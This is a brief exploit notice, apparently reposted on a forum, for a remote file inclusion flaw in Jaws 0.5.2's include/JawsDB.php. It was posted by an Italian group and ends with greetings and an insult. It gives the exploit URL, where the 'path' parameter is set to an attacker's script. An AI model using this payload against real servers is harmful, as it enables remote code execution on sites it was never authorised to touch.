Jaws <= 0.5.2 (include/JawsDB.php) Remote File Include Vulnerability
[code]###### ToXiC #########################
#
# Jaws 0.5.2: Remote File Inclusion by ToXiC CreW
#
# ToXic Security Italian CreW
# BuG FounD by Drago84
#
# Application Affect:
# jaws 0.5.2
#
#
# Sorce Code:
# [url]http://forge.novell.com/modules/xfcontent/private.php/jaws/jaws-0.5.2/jaws-0.5.2.tar.gz[/url]
#
#
# Page:
# JawsDB.php
#
# Problem:
#
# GLOBALS["path"] not Declare
#
# Dir :
# /html/include/
#
#
#
#
#
#
# ExPloit :
# [url]http://www.site.com/jaws_PATH/html/include/JawsDB.php?path=[/url][Evil Script]
#
#
#
# GrEatZ All Member of ToXiC, Str0ke
#
#
# FUCK #Sonic
#
###### ToXiC #########
[/code]
页:
[1]